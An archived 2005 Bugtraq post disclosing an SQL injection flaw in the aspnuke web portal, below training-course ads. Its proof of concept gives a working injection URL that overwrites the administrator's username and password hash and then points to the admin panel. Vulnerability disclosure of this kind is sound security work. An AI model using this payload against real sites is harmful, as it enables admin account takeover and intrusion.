Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]

aspnuke is vulnerable to sql injection

Subject: aspnuke is vulnerable to sql injection
Date: 27 Jun 2005 08:00:46 -0000
*******description*********
aspnuke is web portal system written in asp .
site : www.aspnuke.com

********POC************
It's possible to inject 
htttp://host/module/article/article/article.asp?articleid=1'
for example you can change the admin username and password with this querry :
http://host/module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c'
 , username='trapset'%20where%20userID=1%20--
this will change both username and password to trapset
and then you can login to the admin's conntrol panel from 
www.example.com/module/admin

********************
remember aspnuke is quiet diffrent from asp-nuke
********************

This bug discovered by oil_karchack

<Prev in Thread] Current Thread [Next in Thread>
  • aspnuke is vulnerable to sql injection, oil_karchack <=